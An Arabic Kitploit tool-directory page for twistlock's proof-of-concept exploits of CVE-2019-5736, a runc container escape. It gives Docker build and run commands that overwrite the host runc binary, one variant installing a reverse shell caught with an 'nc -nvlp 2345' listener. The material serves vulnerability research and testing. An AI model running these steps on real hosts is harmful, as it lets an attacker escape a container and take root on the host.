Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RunC-CVE-2019-5736 — CVE-2019-5736 POCs | Kitploit
أدوات/GitHubGitHub/twistlock/runc-cve-2019-5736
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالالفريق الأحمرتطوير الحمولاتالهروب من الحاوية
GitHubtwistlock/runc-cve-2019-5736

RunC-CVE-2019-5736

CVE-2019-5736 POCs

عرض المستودع
8634منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

RunC-CVE-2019-5736

مثالان (PoCs) لـ CVE-2019-5736. راجع Twistlock Labs لشرح CVE-2019-5736 والـ PoCs.

إن PoC الصورة الخبيثة مبني بشكل كبير على PoC لـ q3k، لذا فكل الفضل يعود له.

تشغيل الـ PoCs

ملاحظة: تشغيل الـ PoCs سيؤدي إلى استبدال ثنائي runc على المضيف. يُنصح بإنشاء نسخة من ثنائي runc الخاص بك (عادةً في /usr/sbin/runc) قبل تشغيل أحد الـ PoCs.

استنساخ المستودع:

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736

Exec PoC

يستبدل runc ببرنامج بسيط يطبع سلسلة نصية.

تشغيل exec PoC:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

Malicious Image PoC

يستبدل runc ببرنامج bash نصي لصدفة عكسية بسيطة تتصل بـ localhost:2345.

استمع للصدفة العكسية:

root@kitploit:~
$ nc -nvlp 2345

من نافذة طرفية أخرى، شغّل الـ PoC للصورة الخبيثة:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC
تنزيل الأداة